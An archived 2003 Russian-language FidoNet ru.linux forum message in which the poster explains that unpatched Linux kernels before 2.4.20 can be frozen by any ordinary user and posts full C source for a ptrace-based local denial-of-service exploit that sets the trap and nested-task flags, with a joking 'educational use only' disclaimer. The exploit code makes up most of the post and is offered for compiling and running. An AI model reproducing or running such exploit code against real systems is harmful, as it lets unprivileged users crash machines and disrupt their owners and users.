|
|
ru.linux- RU.LINUX --------------------------------------------------------------------- From : Vasya Kruglov 2:5020/1587.444 02 Jan 2003 22:03:12 To : Valery Efanov Subject : Падение пингвина -------------------------------------------------------------------------------- Втp Дек 17 2002 02:30, Valery Efanov -> Denis Grigorev: DG>> Знакомы сказал что если эхотаг упадёт, то это насмерть, без DG>> восстановления. Это так или он гонит, т.к сам он юзает форточки. VE> А ты не root'ом попробуй его урони сначала :) Если ядро до 2.4.20 и непатченное от этой дырки - то запросто. Эксплоит взят с online.securityfocus.bom/bid (можно найти по фразам "Linux 2.4" и "TF flag"). Компилируешь, запускаешь любым юзером, потом жмешь ресет или power :-) P.S. [Disclaimer для тех, кто в танке] этот код может привести к зависанию Вашей системы и распространяется исключительно в образовательных целях, а также для того, чтобы администратор машины мог проверить ее защищенность от действий злоумышленника. Я не несу ответственности за Ваши действия. P.P.S. Также мне удавалось повесить собственную машину при помощи DoS атаки на 127-й порт (Sun RPC). Там стоял Mandrake 8.x === cut === #include <sys/ptrace.h> struct user_regs_struct { long ebx, ecx, edx, esi, edi, ebp, eax; unsigned short ds, __ds, es, __es; unsigned short fs, __fs, gs, __gs; long orig_eax, eip; unsigned short cs, __cs; long eflags, esp; unsigned short ss, __ss; }; int main( void ) { int pid; char dos[] = "\x9A\x00\x00\x00\x00\x07\x00"; void (* lcall7)( void ) = (void *) dos; struct user_regs_struct d; if( ! ( pid = fork() ) ) { usleep( 1000 ); (* lcall7)(); } else { ptrace( PTRACE_ATTACH, pid, 0, 0 ); while( 1 ) { wait( 0 ); ptrace( PTRACE_GETREGS, pid, 0, &d ); d.eflags |= 0x4100; /* set TF and NT */ ptrace( PTRACE_SETREGS, pid, 0, &d ); ptrace( PTRACE_SYSCALL, pid, 0, 0 ); } } return 1; } === cut === Мяу! Я не утверждаю, что вышенаписанное соответствует действительности. Vasya Kruglov AKA zpt. zpt(at)rambler.ru --- GoldED+/386 1.1.1.2 * Origin: Hастоящему индейцу завсегда везде ништяк! (2:5020/1587.444) Вернуться к списку тем, сортированных по: возрастание даты уменьшение даты тема автор
Архивное /ru.linux/193923e14a9c2.html, оценка из 5, голосов 10
|